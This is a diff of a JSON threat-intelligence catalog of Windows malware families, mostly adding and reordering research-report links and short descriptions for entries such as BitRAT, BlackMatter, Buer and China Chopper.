"https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f3cdfef4-7976-42f9-8b5e-a67d4a62b5c1", + "value": "BIOPASS" + }, { "description": "", "meta": { @@ -9891,7 +11283,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bistromath", "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/", - "https://www.us-cert.gov/ncas/analysis-reports/ar20-045a" + "https://www.us-cert.gov/ncas/analysis-reports/ar20-045a", + "https://ti.qianxin.com/blog/articles/Analysis-of-attacks-by-Lazarus-using-Daewoo-shipyard-as-bait/", + "https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/", + "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/" ], "synonyms": [], "type": [] @@ -9951,10 +11346,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bit_rat", - "https://research.checkpoint.com/2021/apomacrosploit-apocalyptical-fud-race/", + "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html", + "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://krabsonsecurity.com/2020/08/22/bitrat-the-latest-in-copy-pasted-malware-by-incompetent-developers/", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", "https://krabsonsecurity.com/2020/09/04/bitrat-pt-2-hidden-browser-socks5-proxy-and-unknownproducts-unmasked/", "https://github.com/Finch4/Malware-Analysis-Reports/blob/main/13e0f258cfbe3aece8a7e6d29ceb5697/README.md", - "https://krabsonsecurity.com/2020/08/22/bitrat-the-latest-in-copy-pasted-malware-by-incompetent-developers/" + "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html", + "https://research.checkpoint.com/2021/apomacrosploit-apocalyptical-fud-race/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt" ], "synonyms": [], "type": [] @@ -9962,6 +11364,19 @@ "uuid": "8c4363f4-4f38-4a5a-bc87-16f0721bd03b", "value": "BitRAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bizarro", + "https://securelist.com/bizarro-banking-trojan-expands-its-attacks-to-europe/102258/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "00fb2087-7e08-4649-ac93-9547deda7aca", + "value": "Bizzaro" + }, { "description": "BKA Trojaner is a screenlocker ransomware that was active in 2011, displaying a police-themed message in German language.", "meta": { @@ -10008,7 +11423,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy", "https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/", - "https://threatconnect.com/blog/casting-a-light-on-blackenergy/", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf", "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too", "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/", @@ -10021,8 +11436,10 @@ "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games", "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", "https://www.welivesecurity.com/2014/10/14/cve-2014-4114-details-august-blackenergy-powerpoint-campaigns/", + "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf", "https://www.secureworks.com/research/blackenergy2", "https://marcusedmondson.com/2019/01/18/black-energy-analysis/", + "https://threatconnect.com/blog/casting-a-light-on-blackenergy/", "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Cherepanov-Lipovsky.pdf" ], "synonyms": [], @@ -10036,8 +11453,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackkingdom_ransomware", + "https://news.sophos.com/en-us/2021/03/23/black-kingdom/", "https://blog.redteam.pl/2020/06/black-kingdom-ransomware.html", - "https://id-ransomware.blogspot.com/2020/02/blackkingdom-ransomware.html" + "https://id-ransomware.blogspot.com/2020/02/blackkingdom-ransomware.html", + "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html", + "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities", + "https://securelist.com/black-kingdom-ransomware/102873/" ], "synonyms": [], "type": [] @@ -10045,15 +11466,45 @@ "uuid": "246b6563-edd8-49c7-9d3c-97dc1aec6b81", "value": "BlackKingdom Ransomware" }, + { + "description": "Ransomware-as-a-Service ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackmatter", + "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", + "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751", + "https://blog.group-ib.com/blackmatter#", + "https://www.mcafee.com/blogs/enterprise/blackmatter-ransomware-analysis-the-dark-side-returns/", + "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/", + "https://chuongdong.com/reverse%20engineering/2021/09/05/BlackMatterRansomware/", + "https://blog.minerva-labs.com/blackmatter", + "https://www.tesorion.nl/en/posts/analysis-of-the-blackmatter-ransomware/", + "https://www.ciphertechsolutions.com/rapidly-evolving-blackmatter-ransomware-tactics/", + "https://www.netskope.com/blog/netskope-threat-coverage-blackmatter", + "https://blog.digital-investigations.info/2021-08-05-understanding-blackmatters-api-hashing.html", + "https://go.recordedfuture.com/hubfs/reports/MTP-2021-0804.pdf", + "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service", + "https://news.sophos.com/en-us/2021/08/09/blackmatter-ransomware-emerges-from-the-shadow-of-darkside/", + "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2", + "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d", + "https://www.nozominetworks.com/blog/blackmatter-ransomware-technical-analysis-and-tools-from-nozomi-networks-labs/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f838f3bb-a36b-49df-8f8c-1bb8cf66b736", + "value": "BlackMatter (Windows)" + }, { "description": "Advanced and modern Windows botnet with PHP panel developed using VB.NET", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blacknet_rat", - "http://www.pwncode.io/2019/12/blacknet-rat-when-you-leave-panel.html", - "https://labs.k7computing.com/?p=21365", "https://github.com/BlackHacker511/BlackNET/", + "http://www.pwncode.io/2019/12/blacknet-rat-when-you-leave-panel.html", "https://blog.malwarebytes.com/threat-analysis/2020/03/fake-corona-antivirus-distributes-blacknet-remote-administration-tool/", + "https://labs.k7computing.com/?p=21365", + "https://blog.minerva-labs.com/become-a-vip-victim-with-new-discord-distributed-malware", "https://github.com/FarisCode511/BlackNET/" ], "synonyms": [], @@ -10142,7 +11593,7 @@ "value": "BlackRouter" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackruby", @@ -10153,7 +11604,7 @@ "type": [] }, "uuid": "617d53dd-1143-4146-bbc0-39e975a26fe5", - "value": "Blackruby Ransomware" + "value": "Blackruby" }, { "description": "", @@ -10235,6 +11686,20 @@ "uuid": "b34fd401-9d37-4bc6-908f-448c1697f749", "value": "BLINDTOAD" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bloodystealer", + "https://securelist.com/bloodystealer-and-gaming-assets-for-sale/104319/", + "https://twitter.com/3xp0rtblog/status/1380087553676697617" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ecdc0a43-8845-4dc4-a3f0-de2f0142aa4d", + "value": "BloodyStealer" + }, { "description": "", "meta": { @@ -10251,6 +11716,24 @@ "uuid": "cf542e2d-531c-4d34-98c8-7e3cb26a32af", "value": "BLUETHER" }, + { + "description": "Avast describe this malware as a recombination of other malware including SpyEx, ThunderFox, ChromeRecovery, StormKitty, and firepwd.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blustealer", + "https://decoded.avast.io/anhho/blustealer/", + "https://www.gosecure.net/blog/2021/09/22/gosecure-titan-labs-technical-report-blustealer-malware-threat/", + "https://twitter.com/GoSecure_Inc/status/1437435265350397957", + "https://blogs.blackberry.com/en/2021/10/threat-thursday-blustealer-infostealer" + ], + "synonyms": [ + "a310logger" + ], + "type": [] + }, + "uuid": "cb4bfed3-3042-4a29-a72d-c8b5c510faea", + "value": "BluStealer" + }, { "description": "", "meta": { @@ -10356,8 +11839,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bozok", - "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html", - "https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe" + "https://securelist.com/apt-trends-report-q1-2021/101967/", + "https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe", + "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html" ], "synonyms": [], "type": [] @@ -10445,7 +11929,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bredolab", "https://securelist.com/end-of-the-line-for-the-bredolab-botnet/36335/", - "https://www.fireeye.com/blog/threat-research/2010/10/bredolab-its-not-the-size-of-the-dog-in-fight.html" + "https://www.fireeye.com/blog/threat-research/2010/10/bredolab-its-not-the-size-of-the-dog-in-fight.html", + "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf" ], "synonyms": [], "type": [] @@ -10503,6 +11988,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bs2005", "https://github.com/nccgroup/Royal_APT", "https://www.secureworks.com/research/threat-profiles/bronze-palace", + "https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" ], "synonyms": [], @@ -10543,22 +12029,34 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.buer", + "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/", "https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", + "https://securelist.com/mokes-and-buerak-distributed-under-the-guise-of-security-certificates/96324/", + "http://www.secureworks.com/research/threat-profiles/gold-symphony", + "https://www.proofpoint.com/us/threat-insight/post/buer-new-loader-emerges-underground-marketplace", + "https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://blog.minerva-labs.com/stopping-buerloader", - "https://securelist.com/mokes-and-buerak-distributed-under-the-guise-of-security-certificates/96324/", - "https://twitter.com/StopMalvertisin/status/1182505434231398401", "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://krabsonsecurity.com/2019/12/05/buer-loader-new-russian-loader-on-the-market-with-interesting-persistence/", - "https://www.proofpoint.com/us/threat-insight/post/buer-new-loader-emerges-underground-marketplace", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.fortinet.com/blog/threat-research/signed-sealed-and-delivered-signed-xll-file-delivers-buer-loader", + "https://www.proofpoint.com/us/blog/threat-insight/new-variant-buer-loader-written-rust", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", + "http://www.secureworks.com/research/threat-profiles/gold-blackburn", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/", - "https://twitter.com/SophosLabs/status/1321844306970251265", - "https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/" + "https://krabsonsecurity.com/2019/12/05/buer-loader-new-russian-loader-on-the-market-with-interesting-persistence/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://blog.group-ib.com/prometheus-tds", + "https://twitter.com/StopMalvertisin/status/1182505434231398401", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://medium.com/walmartglobaltech/buerloader-updates-3e34c1949b96", + "https://twitter.com/SophosLabs/status/1321844306970251265" ], "synonyms": [ - "Buerloader" + "Buerloader", + "RustyBuer" ], "type": [] }, @@ -10632,6 +12130,7 @@ "http://malware-traffic-analysis.net/2017/05/09/index.html", "https://broadanalysis.com/2019/04/12/rig-exploit-kit-delivers-bunitu-malware/", "https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", "https://blog.malwarebytes.com/threat-analysis/2015/08/whos-behind-your-proxy-uncovering-bunitus-secrets/" ], "synonyms": [], @@ -10742,6 +12241,23 @@ "uuid": "52c0b49b-d57e-400d-8808-a00d4171ac05", "value": "CALMTHORN" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.campoloader", + "https://orangecyberdefense.com/global/blog/cybersoc/in-the-eye-of-our-cybersoc-campo-loader-analysis-and-detection-perspectives/", + "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/", + "https://blog.group-ib.com/prometheus-tds", + "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/", + "https://unit42.paloaltonetworks.com/bazarloader-malware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2bf8ef91-a220-49aa-a7b9-0437d2ee0b15", + "value": "campoloader" + }, { "description": "There is no lot of IOCs in this article so we take one sample and try to extract some interesting IOCs, our findings below :\r\n\r\nCamuBot sample : 37ca2e37e1dc26d6b66ba041ed653dc8ee43e1db71a705df4546449dd7591479\r\n\r\nDropped Files on disk :\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\protecao.exe : 0af612461174eedec813ce670ba35e74a9433361eacb3ceab6d79232a6fe13c1\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\Renci.SshNet.dll : 3E3CD9E8D94FC45F811720F5E911B892A17EE00F971E498EAA8B5CAE44A6A8D8\r\n\r\nC:\\ProgramData\\m.msi : AD90D4ADFED0BDCB2E56871B13CC7E857F64C906E2CF3283D30D6CFD24CD2190\r\n\r\nProtecao.exe try to download hxxp://www.usb-over-network.com/usb-over-network-64bit.msi\r\n\r\nA new driver is installed : C:\\Windows\\system32\\drivers\\ftusbload2.sys : 9255E8B64FB278BC5FFE5B8F70D68AF8\r\n\r\nftusbload2.sys set 28 IRP handlers.", "meta": { @@ -10788,6 +12304,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak", "https://threatintel.blog/OPBlueRaven-Part1/", + "https://therecord.media/two-carbanak-hackers-sentenced-to-eight-years-in-prison-in-kazakhstan/", "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-three-behind-the-backdoor.html", "https://app.box.com/s/p7qzcury97tuwk26694uutujwqmwqyhe", "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/", @@ -10797,10 +12314,11 @@ "https://www.secureworks.com/research/threat-profiles/gold-niagara", "https://www.brighttalk.com/webcast/15591/382191/fin7-apt-how-billion-dollar-crime-ring-remains-active-after-leaders-arrest", "https://threatintel.blog/OPBlueRaven-Part2/", + "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-one-a-rare-occurrence.html", "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-two-continuing-source-code-analysis.html", "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-four-desktop-video-player.html", - "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-one-a-rare-occurrence.html" + "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/" ], "synonyms": [ "Anunak" @@ -10815,6 +12333,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.carberp", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", "https://blog.avast.com/2013/04/08/carberp_epitaph/", "https://web.archive.org/web/20150713145858/http://www.rsaconference.com/writable/presentations/file_upload/ht-t06-dissecting-banking-trojan-carberp_copy1.pdf", "https://cdn1.esetstatic.com/eset/US/resources/docs/white-papers/white-papers-win-32-carberp.pdf" @@ -10947,13 +12466,19 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerber", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", "https://blog.malwarebytes.com/threat-analysis/2016/03/cerber-ransomware-new-but-mature/", + "https://www.youtube.com/watch?v=y8Z9KnL8s8s", "https://rinseandrepeatanalysis.blogspot.com/2018/08/reversing-cerber-raas.html", - "http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/", + "https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Taniguchi-How-Did-The-Adversaries-Abusing-The-Bitcoin-Blockchain-Evade-Our-Takeover.pdf", "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", "https://www.youtube.com/watch?v=LUxOcpIRxmg", - "https://www.virusbulletin.com/virusbulletin/2017/12/vb2017-paper-nine-circles-cerber/" + "https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf", + "https://www.virusbulletin.com/virusbulletin/2017/12/vb2017-paper-nine-circles-cerber/", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/" ], "synonyms": [], "type": [] @@ -10979,8 +12504,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chainshot", "https://researchcenter.paloaltonetworks.com/2018/09/unit42-slicing-dicing-cve-2018-5002-payloads-new-chainshot-malware/", - "https://www.vice.com/en_us/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec", - "https://www.icebrg.io/blog/adobe-flash-zero-day-targeted-attack" + "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/", + "https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/", + "https://www.icebrg.io/blog/adobe-flash-zero-day-targeted-attack", + "https://www.vice.com/en_us/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec" ], "synonyms": [], "type": [] @@ -10988,6 +12515,23 @@ "uuid": "36f9a5e0-9a78-4b9a-9072-1596c91b59b6", "value": "Chainshot" }, + { + "description": "In-development ransomware family which was released in June 2021 by an unknown threat actor. The builder initially claimed to be a \"Ryuk .Net Ransomware Builder\" even though it was completely unrelated to the Ryuk malware family. Presently it appears to contain trojan-like features, but lacks features commonly found in ransomware such as data exfiltration.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.chaos", + "https://marcoramilli.com/2021/06/14/the-allegedly-ryuk-ransomware-builder-ryukjoke/", + "https://www.trendmicro.com/en_us/research/21/h/chaos-ransomware-a-dangerous-proof-of-concept.html" + ], + "synonyms": [ + "FakeRyuk", + "RyukJoke" + ], + "type": [] + }, + "uuid": "fb760029-9331-4ba0-b644-d47a8e6d3ad2", + "value": "Chaos" + }, { "description": "According to Kaspersky GReAT and AMR, TajMahal is a previously unknown and technically sophisticated APT framework discovered by Kaspersky Lab in the autumn of 2018. This full-blown spying framework consists of two packages named Tokyo and Yokohama. It includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents and cryptography key stealers, and even its own file indexer for the victim’s machine. We discovered up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins they have ever seen for an APT toolset.", "meta": { @@ -11016,7 +12560,7 @@ "type": [] }, "uuid": "22b03600-505c-41d4-ba1c-45d70cc2e123", - "value": "CHCH Ransomware" + "value": "CHCH" }, { "description": "", @@ -11105,34 +12649,59 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinachopper", + "https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html", "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers", + "https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html", + "https://www.secureworks.com/research/threat-profiles/bronze-union", + "https://www.youtube.com/watch?v=rn-6t7OygGk", "https://www.huntress.com/blog/rapid-response-mass-exploitation-of-on-prem-exchange-servers", "https://www.secureworks.com/research/threat-profiles/bronze-express", "https://unit42.paloaltonetworks.com/china-chopper-webshell/", "https://www.crowdstrike.com/blog/an-end-to-smash-and-grab-more-targeted-approaches/", + "https://unit42.paloaltonetworks.com/microsoft-exchange-server-attack-timeline/", "https://www.secureworks.com/research/threat-profiles/bronze-president", "https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day", "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/", "https://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html", "https://twitter.com/ESETresearch/status/1366862946488451088", + "https://www.trendmicro.com/en_us/research/21/d/could-the-microsoft-exchange-breach-be-stopped.html", "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", "https://redcanary.com/blog/microsoft-exchange-attacks", - "https://www.secureworks.com/research/threat-profiles/bronze-mohawk", + "https://www.domaintools.com/resources/blog/examining-exchange-exploitation-and-its-lessons-for-defenders", + "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/multi-factor-authentication-new-attacks", + "https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", + "https://www.picussecurity.com/resource/blog/ttps-hafnium-microsoft-exchange-servers", "https://www.huntress.com/hubfs/Mass%20Exploitation%20of%20Microsoft%20Exchange%20(2).pdf", + "https://techcommunity.microsoft.com/t5/azure-sentinel/web-shell-threat-hunting-with-azure-sentinel/ba-p/2234968", "https://www.crowdstrike.com/blog/falcon-complete-stops-microsoft-exchange-server-zero-day-exploits", "https://attack.mitre.org/software/S0020/", "https://blog.joshlemon.com.au/hafnium-exchange-attacks/", + "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf", "https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html", + "https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hafnium-china-chopper-and-aspnet-runtime/", + "https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/", "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf", - "https://www.praetorian.com/blog/reproducing-proxylogon-exploit/", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/", + "https://www.fireeye.com/blog/threat-research/2021/09/proxyshell-exploiting-microsoft-exchange-servers.html", + "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html", "https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html", - "https://us-cert.cisa.gov/ncas/alerts/aa20-259a", + "https://www.devo.com/blog/detect-and-investigate-hafnium-using-devo/", + "https://unit42.paloaltonetworks.com/exchange-server-credential-harvesting/", + "https://www.praetorian.com/blog/reproducing-proxylogon-exploit/", + "https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", "https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html", + "https://www.secureworks.com/research/threat-profiles/bronze-mohawk", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection", + "https://us-cert.cisa.gov/ncas/alerts/aa20-259a", + "https://www.imperva.com/blog/imperva-observes-hive-of-activity-following-hafnium-microsoft-exchange-disclosures/", "https://us-cert.cisa.gov/ncas/alerts/aa20-275a", "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html", - "https://www.secureworks.com/research/threat-profiles/bronze-union", + "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf", + "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", "https://unit42.paloaltonetworks.com/remediation-steps-for-the-Microsoft-Exchange-Server-vulnerabilities/", "https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers", "https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html", @@ -11161,7 +12730,7 @@ "value": "Chinad" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinajm", @@ -11171,7 +12740,7 @@ "type": [] }, "uuid": "ef216f1d-9ee5-4676-ae34-f954a8611290", - "value": "ChinaJm Ransomware" + "value": "ChinaJm" }, { "description": "", @@ -11211,6 +12780,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chthonic", "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", "https://securelist.com/chthonic-a-new-modification-of-zeus/68176/", "https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html" ], @@ -11242,6 +12812,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cinobi", "http://www.pwncode.io/2019/12/unpacking-payload-used-in-bottle-ek.html", "https://documents.trendmicro.com/assets/pdf/Tech%20Brief_Operation%20Overtrap%20Targets%20Japanese%20Online%20Banking%20Users.pdf", + "https://www.trendmicro.com/en_us/research/21/h/cinobi-banking-trojan-targets-users-of-cryptocurrency-exchanges-.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-overtrap-targets-japanese-online-banking-users-via-bottle-exploit-kit-and-brand-new-cinobi-banking-trojan/" ], "synonyms": [], @@ -11255,8 +12826,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.citadel", - "http://www.xylibox.com/2016/02/citadel-0011-atmos.html", "https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf", + "http://www.xylibox.com/2016/02/citadel-0011-atmos.html", + "https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals", + 